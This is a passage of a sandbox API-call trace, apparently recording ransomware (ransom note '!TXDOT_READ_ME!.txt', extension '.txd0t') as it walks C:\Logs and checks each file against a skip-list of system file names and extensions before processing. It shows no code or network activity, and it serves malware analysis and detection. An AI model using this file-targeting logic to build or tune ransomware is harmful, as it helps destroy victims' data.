(psz1="Microsoft-Windows-CodeIntegrity%4Operational.evtx", psz2="autorun.inf") returned 1 [0071.876] StrCmpIW (psz1="Microsoft-Windows-CodeIntegrity%4Operational.evtx", psz2="ntuser.dat") returned -1 [0071.876] StrCmpIW (psz1="Microsoft-Windows-CodeIntegrity%4Operational.evtx", psz2="ntldr") returned -1 [0071.876] StrCmpIW (psz1="Microsoft-Windows-CodeIntegrity%4Operational.evtx", psz2="ntdetect.com") returned -1 [0071.876] StrCmpIW (psz1="Microsoft-Windows-CodeIntegrity%4Operational.evtx", psz2="bootfont.bin") returned 1 [0071.876] StrCmpIW (psz1="Microsoft-Windows-CodeIntegrity%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.876] PathFindExtensionW (pszPath="Microsoft-Windows-CodeIntegrity%4Operational.evtx") returned=".evtx" [0071.877] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.877] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.877] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.877] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.877] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.877] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.877] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.877] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c3c71c5, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x8c3c71c5, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", cAlternateFileName="MI5CA2~1.EVT")) returned 1 [0071.877] StrCmpW (psz1="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", psz2=".") returned 1 [0071.877] StrCmpW (psz1="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", psz2="..") returned 1 [0071.877] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.877] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.877] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx" [0071.877] PathFindExtensionW (pszPath="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx") returned=".evtx" [0071.877] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.877] StrCmpIW (psz1="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", psz2="bootsect.bak") returned 1 [0071.877] StrCmpIW (psz1="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", psz2="iconcache.db") returned 1 [0071.877] StrCmpIW (psz1="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", psz2="thumbs.db") returned -1 [0071.877] StrCmpIW (psz1="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", psz2=" ransomware ") returned 1 [0071.877] StrCmpIW (psz1="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", psz2=" ransom ") returned 1 [0071.877] StrCmpIW (psz1="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", psz2="debug.txt") returned 1 [0071.877] StrCmpIW (psz1="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", psz2="boot.ini") returned 1 [0071.877] StrCmpIW (psz1="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", psz2="desktop.ini") returned 1 [0071.877] StrCmpIW (psz1="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", psz2="autorun.inf") returned 1 [0071.877] StrCmpIW (psz1="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", psz2="ntuser.dat") returned -1 [0071.877] StrCmpIW (psz1="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", psz2="ntldr") returned -1 [0071.878] StrCmpIW (psz1="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", psz2="ntdetect.com") returned -1 [0071.878] StrCmpIW (psz1="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", psz2="bootfont.bin") returned 1 [0071.878] StrCmpIW (psz1="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.878] PathFindExtensionW (pszPath="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx") returned=".evtx" [0071.878] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.878] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.878] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.878] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.878] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.878] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.878] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.878] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50cc9231, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50cc9231, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", cAlternateFileName="MI5FD1~1.EVT")) returned 1 [0071.878] StrCmpW (psz1="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", psz2=".") returned 1 [0071.878] StrCmpW (psz1="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", psz2="..") returned 1 [0071.878] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.878] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.878] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx") returned="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx" [0071.878] PathFindExtensionW (pszPath="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx") returned=".evtx" [0071.878] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.878] StrCmpIW (psz1="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", psz2="bootsect.bak") returned 1 [0071.878] StrCmpIW (psz1="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", psz2="iconcache.db") returned 1 [0071.878] StrCmpIW (psz1="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", psz2="thumbs.db") returned -1 [0071.878] StrCmpIW (psz1="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", psz2=" ransomware ") returned 1 [0071.878] StrCmpIW (psz1="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", psz2=" ransom ") returned 1 [0071.878] StrCmpIW (psz1="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", psz2="debug.txt") returned 1 [0071.878] StrCmpIW (psz1="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", psz2="boot.ini") returned 1 [0071.879] StrCmpIW (psz1="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", psz2="desktop.ini") returned 1 [0071.879] StrCmpIW (psz1="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", psz2="autorun.inf") returned 1 [0071.879] StrCmpIW (psz1="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", psz2="ntuser.dat") returned -1 [0071.879] StrCmpIW (psz1="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", psz2="ntldr") returned -1 [0071.879] StrCmpIW (psz1="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", psz2="ntdetect.com") returned -1 [0071.879] StrCmpIW (psz1="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", psz2="bootfont.bin") returned 1 [0071.879] StrCmpIW (psz1="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.879] PathFindExtensionW (pszPath="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx") returned=".evtx" [0071.879] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.879] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.879] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.879] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.879] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.879] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.879] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.879] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50ca2fbd, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50ca2fbd, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", cAlternateFileName="MI8BDF~1.EVT")) returned 1 [0071.879] StrCmpW (psz1="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", psz2=".") returned 1 [0071.879] StrCmpW (psz1="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", psz2="..") returned 1 [0071.879] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.879] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.879] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx" [0071.879] PathFindExtensionW (pszPath="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx") returned=".evtx" [0071.879] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.879] StrCmpIW (psz1="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", psz2="bootsect.bak") returned 1 [0071.879] StrCmpIW (psz1="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", psz2="iconcache.db") returned 1 [0071.879] StrCmpIW (psz1="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", psz2="thumbs.db") returned -1 [0071.879] StrCmpIW (psz1="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", psz2=" ransomware ") returned 1 [0071.879] StrCmpIW (psz1="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", psz2=" ransom ") returned 1 [0071.880] StrCmpIW (psz1="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", psz2="debug.txt") returned 1 [0071.880] StrCmpIW (psz1="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", psz2="boot.ini") returned 1 [0071.880] StrCmpIW (psz1="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", psz2="desktop.ini") returned 1 [0071.880] StrCmpIW (psz1="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", psz2="autorun.inf") returned 1 [0071.880] StrCmpIW (psz1="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", psz2="ntuser.dat") returned -1 [0071.880] StrCmpIW (psz1="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", psz2="ntldr") returned -1 [0071.880] StrCmpIW (psz1="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", psz2="ntdetect.com") returned -1 [0071.880] StrCmpIW (psz1="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", psz2="bootfont.bin") returned 1 [0071.880] StrCmpIW (psz1="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.880] PathFindExtensionW (pszPath="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx") returned=".evtx" [0071.880] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.880] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.880] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.880] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.880] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.880] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.880] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.880] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c3ed420, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x8c3ed420, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x101000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", cAlternateFileName="MIAEBD~1.EVT")) returned 1 [0071.880] StrCmpW (psz1="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", psz2=".") returned 1 [0071.880] StrCmpW (psz1="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", psz2="..") returned 1 [0071.880] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.880] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.880] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx") returned="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx" [0071.880] PathFindExtensionW (pszPath="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx") returned=".evtx" [0071.880] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.880] StrCmpIW (psz1="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", psz2="bootsect.bak") returned 1 [0071.880] StrCmpIW (psz1="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", psz2="iconcache.db") returned 1 [0071.880] StrCmpIW (psz1="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", psz2="thumbs.db") returned -1 [0071.880] StrCmpIW (psz1="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", psz2=" ransomware ") returned 1 [0071.880] StrCmpIW (psz1="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", psz2=" ransom ") returned 1 [0071.881] StrCmpIW (psz1="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", psz2="debug.txt") returned 1 [0071.881] StrCmpIW (psz1="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", psz2="boot.ini") returned 1 [0071.881] StrCmpIW (psz1="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", psz2="desktop.ini") returned 1 [0071.881] StrCmpIW (psz1="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", psz2="autorun.inf") returned 1 [0071.881] StrCmpIW (psz1="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", psz2="ntuser.dat") returned -1 [0071.881] StrCmpIW (psz1="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", psz2="ntldr") returned -1 [0071.881] StrCmpIW (psz1="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", psz2="ntdetect.com") returned -1 [0071.881] StrCmpIW (psz1="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", psz2="bootfont.bin") returned 1 [0071.881] StrCmpIW (psz1="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.881] PathFindExtensionW (pszPath="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx") returned=".evtx" [0071.881] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.881] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.881] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.881] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.881] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.881] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.881] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.881] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50cef47f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50cef47f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-DeviceSetupManager%4Admin.evtx", cAlternateFileName="MIA726~1.EVT")) returned 1 [0071.881] StrCmpW (psz1="Microsoft-Windows-DeviceSetupManager%4Admin.evtx", psz2=".") returned 1 [0071.881] StrCmpW (psz1="Microsoft-Windows-DeviceSetupManager%4Admin.evtx", psz2="..") returned 1 [0071.881] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.881] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.881] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-DeviceSetupManager%4Admin.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx") returned="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx" [0071.881] PathFindExtensionW (pszPath="Microsoft-Windows-DeviceSetupManager%4Admin.evtx") returned=".evtx" [0071.881] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.881] StrCmpIW (psz1="Microsoft-Windows-DeviceSetupManager%4Admin.evtx", psz2="bootsect.bak") returned 1 [0071.881] StrCmpIW (psz1="Microsoft-Windows-DeviceSetupManager%4Admin.evtx", psz2="iconcache.db") returned 1 [0071.881] StrCmpIW (psz1="Microsoft-Windows-DeviceSetupManager%4Admin.evtx", psz2="thumbs.db") returned -1 [0071.881] StrCmpIW (psz1="Microsoft-Windows-DeviceSetupManager%4Admin.evtx", psz2=" ransomware ") returned 1 [0071.881] StrCmpIW (psz1="Microsoft-Windows-DeviceSetupManager%4Admin.evtx", psz2=" ransom ") returned 1 [0071.882] StrCmpIW (psz1="Microsoft-Windows-DeviceSetupManager%4Admin.evtx", psz2="debug.txt") returned 1 [0071.882] StrCmpIW (psz1="Microsoft-Windows-DeviceSetupManager%4Admin.evtx", psz2="boot.ini") returned 1 [0071.882] StrCmpIW (psz1="Microsoft-Windows-DeviceSetupManager%4Admin.evtx", psz2="desktop.ini") returned 1 [0071.882] StrCmpIW (psz1="Microsoft-Windows-DeviceSetupManager%4Admin.evtx", psz2="autorun.inf") returned 1 [0071.882] StrCmpIW (psz1="Microsoft-Windows-DeviceSetupManager%4Admin.evtx", psz2="ntuser.dat") returned -1 [0071.882] StrCmpIW (psz1="Microsoft-Windows-DeviceSetupManager%4Admin.evtx", psz2="ntldr") returned -1 [0071.882] StrCmpIW (psz1="Microsoft-Windows-DeviceSetupManager%4Admin.evtx", psz2="ntdetect.com") returned -1 [0071.882] StrCmpIW (psz1="Microsoft-Windows-DeviceSetupManager%4Admin.evtx", psz2="bootfont.bin") returned 1 [0071.882] StrCmpIW (psz1="Microsoft-Windows-DeviceSetupManager%4Admin.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.882] PathFindExtensionW (pszPath="Microsoft-Windows-DeviceSetupManager%4Admin.evtx") returned=".evtx" [0071.882] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.882] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.882] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.882] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.882] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.882] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.882] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.882] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50cc9231, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50cc9231, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-DeviceSetupManager%4Operational.evtx", cAlternateFileName="MI08CB~1.EVT")) returned 1 [0071.882] StrCmpW (psz1="Microsoft-Windows-DeviceSetupManager%4Operational.evtx", psz2=".") returned 1 [0071.882] StrCmpW (psz1="Microsoft-Windows-DeviceSetupManager%4Operational.evtx", psz2="..") returned 1 [0071.882] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.882] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.882] StrNCatW (in: psz1="C:\\Logs\\", 